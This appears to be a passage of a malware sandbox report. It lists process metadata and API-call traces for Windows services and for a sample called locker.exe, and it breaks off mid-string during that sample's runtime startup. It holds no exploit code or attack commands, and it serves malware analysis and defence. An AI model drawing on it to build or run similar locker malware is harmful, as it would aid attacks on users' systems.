(_Block=0x33026e0) [0161.160] free (_Block=0x33026f8) [0161.160] free (_Block=0x33026a0) [0161.160] free (_Block=0x3302660) [0161.160] free (_Block=0x330ad28) [0161.160] WbemLocator:IUnknown:Release (This=0x30f3d70) returned 0x2 [0161.160] WbemLocator:IUnknown:Release (This=0x312a0e0) returned 0x0 [0161.161] WbemLocator:IUnknown:Release (This=0x30faf20) returned 0x0 [0161.162] WbemLocator:IUnknown:Release (This=0x30f3d70) returned 0x1 [0161.166] ?Empty@CHString@@QAEXXZ () returned 0x732365f8 [0161.166] WbemLocator:IUnknown:Release (This=0x30f3d70) returned 0x0 [0161.166] free (_Block=0x330aa10) [0161.166] free (_Block=0x330abc0) [0161.166] free (_Block=0x3302910) [0161.166] free (_Block=0x330a908) [0161.166] free (_Block=0x330aa70) [0161.166] free (_Block=0x33028f0) [0161.166] free (_Block=0x330aa40) [0161.166] free (_Block=0x330ab78) [0161.166] free (_Block=0x33028b0) [0161.166] free (_Block=0x330ab60) [0161.166] free (_Block=0x330a950) [0161.166] free (_Block=0x3302890) [0161.166] free (_Block=0x330ab30) [0161.167] free (_Block=0x330ab18) [0161.167] free (_Block=0x3302ab0) [0161.167] free (_Block=0x330ab48) [0161.167] free (_Block=0x330aad0) [0161.167] free (_Block=0x3302b10) [0161.167] free (_Block=0x330a980) [0161.167] free (_Block=0x330aba8) [0161.167] free (_Block=0x3302ad0) [0161.167] free (_Block=0x330ab90) [0161.167] free (_Block=0x330a9b0) [0161.167] free (_Block=0x3302af0) [0161.167] free (_Block=0x33096c8) [0161.167] free (_Block=0x330abf0) [0161.167] free (_Block=0x3302a50) [0161.167] free (_Block=0x330aae8) [0161.167] free (_Block=0x330a968) [0161.167] free (_Block=0x3302a90) [0161.167] free (_Block=0x330aa58) [0161.168] free (_Block=0x330a998) [0161.168] free (_Block=0x3302c10) [0161.168] free (_Block=0x330a9f8) [0161.168] free (_Block=0x330ab00) [0161.168] free (_Block=0x33028d0) [0161.168] free (_Block=0x3309740) [0161.168] free (_Block=0x3309650) [0161.168] free (_Block=0x3302970) [0161.168] free (_Block=0x3309638) [0161.168] free (_Block=0x3309680) [0161.168] free (_Block=0x3302930) [0161.168] free (_Block=0x33095d8) [0161.168] free (_Block=0x3309620) [0161.168] free (_Block=0x3302950) [0161.168] free (_Block=0x3309590) [0161.168] free (_Block=0x33095f0) [0161.168] free (_Block=0x3302a10) [0161.168] free (_Block=0x3309758) [0161.168] free (_Block=0x3309668) [0161.168] free (_Block=0x3302c50) [0161.169] free (_Block=0x33096f8) [0161.169] free (_Block=0x3309698) [0161.169] free (_Block=0x3302a30) [0161.169] free (_Block=0x33096e0) [0161.169] free (_Block=0x3309710) [0161.169] free (_Block=0x3302c30) [0161.169] free (_Block=0x3309728) [0161.169] free (_Block=0x33095c0) [0161.169] free (_Block=0x3302a70) [0161.169] free (_Block=0x3309608) [0161.169] free (_Block=0x33096b0) [0161.169] free (_Block=0x3302b90) [0161.169] CoUninitialize () [0161.397] exit (_Code=-2147217388) [0161.398] free (_Block=0x330ace0) [0161.398] free (_Block=0x3300fe0) [0161.398] ??1CHString@@QAE@XZ () returned 0x732365f8 [0161.398] free (_Block=0x3302d00) [0161.398] free (_Block=0x33011d8) [0161.398] free (_Block=0x3300fc0) [0161.398] free (_Block=0x3300fa0) [0161.398] free (_Block=0x3300f70) [0161.398] free (_Block=0x3300f50) [0161.398] free (_Block=0x3300f20) [0161.398] free (_Block=0x3300ee0) [0161.398] free (_Block=0x3300ec0) [0161.398] ??1CHString@@QAE@XZ () returned 0x732365f8 [0161.398] free (_Block=0x330adf8) Thread: id = 38 os_tid = 0xcd0 Thread: id = 40 os_tid = 0xb0 Thread: id = 41 os_tid = 0xd80 Thread: id = 42 os_tid = 0xc2c Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x742fe000" os_pid = "0x3ac" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 43 os_tid = 0xfc4 Thread: id = 44 os_tid = 0xf64 Thread: id = 45 os_tid = 0xf88 Thread: id = 46 os_tid = 0xf28 Thread: id = 47 os_tid = 0xf44 Thread: id = 48 os_tid = 0xdac Thread: id = 49 os_tid = 0xf40 Thread: id = 50 os_tid = 0xefc Thread: id = 51 os_tid = 0xee0 Thread: id = 52 os_tid = 0xea8 Thread: id = 53 os_tid = 0xebc Thread: id = 54 os_tid = 0xea4 Thread: id = 55 os_tid = 0x6e0 Thread: id = 56 os_tid = 0xf0 Thread: id = 57 os_tid = 0x648 Thread: id = 58 os_tid = 0xf84 Thread: id = 59 os_tid = 0x125c Thread: id = 60 os_tid = 0x11d0 Thread: id = 61 os_tid = 0x11c4 Thread: id = 62 os_tid = 0x738 Thread: id = 63 os_tid = 0x1370 Thread: id = 64 os_tid = 0x1328 Thread: id = 65 os_tid = 0x1320 Thread: id = 66 os_tid = 0x131c Thread: id = 67 os_tid = 0x1318 Thread: id = 68 os_tid = 0x1314 Thread: id = 69 os_tid = 0x1310 Thread: id = 70 os_tid = 0x12b0 Thread: id = 71 os_tid = 0x12e4 Thread: id = 72 os_tid = 0x12e0 Thread: id = 73 os_tid = 0x12d0 Thread: id = 74 os_tid = 0x12c4 Thread: id = 75 os_tid = 0x1198 Thread: id = 76 os_tid = 0x112c Thread: id = 77 os_tid = 0x1128 Thread: id = 78 os_tid = 0x1124 Thread: id = 79 os_tid = 0x10ec Thread: id = 80 os_tid = 0x10e8 Thread: id = 81 os_tid = 0x10e4 Thread: id = 82 os_tid = 0x10d4 Thread: id = 83 os_tid = 0x1058 Thread: id = 84 os_tid = 0x1040 Thread: id = 85 os_tid = 0x103c Thread: id = 86 os_tid = 0x1038 Thread: id = 87 os_tid = 0x1034 Thread: id = 88 os_tid = 0x102c Thread: id = 89 os_tid = 0xf1c Thread: id = 90 os_tid = 0xf0c Thread: id = 91 os_tid = 0xeec Thread: id = 92 os_tid = 0xaa0 Thread: id = 93 os_tid = 0xa30 Thread: id = 94 os_tid = 0xa14 Thread: id = 95 os_tid = 0xa0c Thread: id = 96 os_tid = 0x9e8 Thread: id = 97 os_tid = 0x9e0 Thread: id = 98 os_tid = 0x9d8 Thread: id = 99 os_tid = 0x9cc Thread: id = 100 os_tid = 0x9c4 Thread: id = 101 os_tid = 0x9b8 Thread: id = 102 os_tid = 0x9b0 Thread: id = 103 os_tid = 0x9a0 Thread: id = 104 os_tid = 0x998 Thread: id = 105 os_tid = 0x984 Thread: id = 106 os_tid = 0x978 Thread: id = 107 os_tid = 0x968 Thread: id = 108 os_tid = 0x95c Thread: id = 109 os_tid = 0x958 Thread: id = 110 os_tid = 0x944 Thread: id = 111 os_tid = 0x930 Thread: id = 112 os_tid = 0x914 Thread: id = 113 os_tid = 0x8ac Thread: id = 114 os_tid = 0x840 Thread: id = 115 os_tid = 0x83c Thread: id = 116 os_tid = 0x430 Thread: id = 117 os_tid = 0x7c0 Thread: id = 118 os_tid = 0x7bc Thread: id = 119 os_tid = 0x7ac Thread: id = 120 os_tid = 0x784 Thread: id = 121 os_tid = 0x780 Thread: id = 122 os_tid = 0x77c Thread: id = 123 os_tid = 0x6fc Thread: id = 124 os_tid = 0x678 Thread: id = 125 os_tid = 0x670 Thread: id = 126 os_tid = 0x660 Thread: id = 127 os_tid = 0x654 Thread: id = 128 os_tid = 0x61c Thread: id = 129 os_tid = 0x5d0 Thread: id = 130 os_tid = 0x5a0 Thread: id = 131 os_tid = 0x4ac Thread: id = 132 os_tid = 0x41c Thread: id = 133 os_tid = 0x414 Thread: id = 134 os_tid = 0x404 Thread: id = 135 os_tid = 0x158 Thread: id = 136 os_tid = 0x39c Thread: id = 137 os_tid = 0x2e8 Thread: id = 138 os_tid = 0x180 Thread: id = 139 os_tid = 0x234 Thread: id = 140 os_tid = 0x26c Thread: id = 141 os_tid = 0x2a0 Thread: id = 142 os_tid = 0x170 Thread: id = 143 os_tid = 0x1a8 Thread: id = 144 os_tid = 0x16c Thread: id = 145 os_tid = 0x3b0 Thread: id = 146 os_tid = 0xf00 Thread: id = 164 os_tid = 0xd58 Thread: id = 165 os_tid = 0x1050 Thread: id = 166 os_tid = 0x1070 Thread: id = 178 os_tid = 0x13ac Thread: id = 179 os_tid = 0x13e4 Thread: id = 180 os_tid = 0x13c0 Thread: id = 181 os_tid = 0x13b4 Thread: id = 182 os_tid = 0x1338 Thread: id = 185 os_tid = 0x484 Thread: id = 187 os_tid = 0x980 Thread: id = 194 os_tid = 0xdf0 Thread: id = 195 os_tid = 0xdd8 Thread: id = 199 os_tid = 0x1a0 Thread: id = 200 os_tid = 0x258 Process: id = "10" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x3a5d000" os_pid = "0x10fc" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 147 os_tid = 0x1120 Thread: id = 148 os_tid = 0x111c Thread: id = 149 os_tid = 0x1118 Thread: id = 150 os_tid = 0x1114 Thread: id = 151 os_tid = 0x1110 Thread: id = 152 os_tid = 0x110c Thread: id = 153 os_tid = 0x1108 Thread: id = 154 os_tid = 0x1100 Process: id = "11" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x3a6d1000" os_pid = "0xe0c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002e7d2" [0xc000000f] Thread: id = 155 os_tid = 0x1020 Thread: id = 156 os_tid = 0x1030 Thread: id = 157 os_tid = 0xe30 Thread: id = 158 os_tid = 0xe2c Thread: id = 159 os_tid = 0xe28 Thread: id = 160 os_tid = 0xe24 Thread: id = 161 os_tid = 0xe20 Thread: id = 162 os_tid = 0xe1c Thread: id = 163 os_tid = 0xe10 Process: id = "12" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x2266e000" os_pid = "0x10ac" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0008574f" [0xc000000f] Thread: id = 168 os_tid = 0x10b4 Thread: id = 169 os_tid = 0x50c Thread: id = 171 os_tid = 0xfb0 Thread: id = 172 os_tid = 0xfa4 Thread: id = 173 os_tid = 0xf9c Thread: id = 174 os_tid = 0xf78 Thread: id = 175 os_tid = 0x864 Thread: id = 176 os_tid = 0x13c8 Thread: id = 177 os_tid = 0x13b8 Process: id = "13" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x1064d000" os_pid = "0x1138" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x3ac" cmd_line = "C:\\WINDOWS\\system32\\sc.exe start wuauserv" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 184 os_tid = 0x137c Process: id = "14" image_name = "locker.exe" filename = "c:\\users\\fd1hvy\\desktop\\locker.exe" page_root = "0xc3a1000" os_pid = "0x1178" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x3ac" cmd_line = "C:\\Users\\FD1HVy\\Desktop\\locker.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 183 os_tid = 0x12b4 [0190.565] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0190.565] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0190.567] GetProcAddress (hModule=0x74bc0000, lpProcName=0x37326c) returned 0x74cb7060 [0190.567] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0190.567] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsAlloc") returned 0x74cbbea0 [0190.567] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsSetValue") returned 0x74cb2550 [0190.568] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0190.568] GetProcAddress (hModule=0x74bc0000, lpProcName="InitializeCriticalSectionEx") returned 0x74cb7060 [0190.568] GetProcessHeap () returned 0x13d0000 [0190.568] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0190.568] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsAlloc") returned 0x74cbbea0 [0190.569] GetLastError () returned 0x0 [0190.569] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsGetValue") returned 0x74ca70c0 [0190.569] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0x364) returned 0x13ea4c8 [0190.569] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsSetValue") returned 0x74cb2550 [0190.569] SetLastError (dwErrCode=0x0) [0190.569] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x8, Size=0xc00) returned 0x13ea838 [0196.538] GetStartupInfoW (in: lpStartupInfo=0x10ff870 | out: lpStartupInfo=0x10ff870*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\locker.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3518b0, hStdOutput=0xc151d463, hStdError=0xfffffffe)) [0196.538] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0196.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0196.538] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0196.538] GetCommandLineA () returned="C:\\Users\\FD1HVy\\Desktop\\locker.exe" [0196.538] GetCommandLineW () returned="C:\\Users\\FD1HVy\\Desktop\\locker.exe" [0196.538] GetLastError () returned 0x0 [0196.538] SetLastError (dwErrCode=0x0) [0196.538] GetLastError () returned 0x0 [0196.538] SetLastError (dwErrCode=0x0) [0196.538] GetACP () returned 0x4e4 [0196.538] RtlAllocateHeap (HeapHandle=0x13d0000, Flags=0x0, Size=0x220) returned 0x13eb440 [0196.538] IsValidCodePage (CodePage=0x4e4) returned 1 [0196.538] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x10ff8a0 | out: lpCPInfo=0x10ff8a0) returned 1 [0196.538] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x10ff168 | out: lpCPInfo=0x10ff168) returned 1 [0196.538] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x10ff77c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0196.538] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x10ff77c, cbMultiByte=256, lpWideCharStr=0x10fef08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㕤6Ā") returned 256 [0196.538] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㕤6Ā", cchSrc=256, lpCharType=0x10ff17c | out: lpCharType=0x10ff17c) returned 1 [0196.538] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x10ff77c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0196.539] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x10ff77c, cbMultiByte=256, lpWideCharStr=0x10feeb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿܻ6Ā") returned 256 [0196.539] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0196.539] GetProcAddress (hModule=0x74bc0000, lpProcName="LCMapStringEx") returned 0x74c9ed00 [0196.539] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿܻ6Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0196.539] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿܻ6Ā", cchSrc=256, lpDestStr=0x10feca8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0196.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x10ff67c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 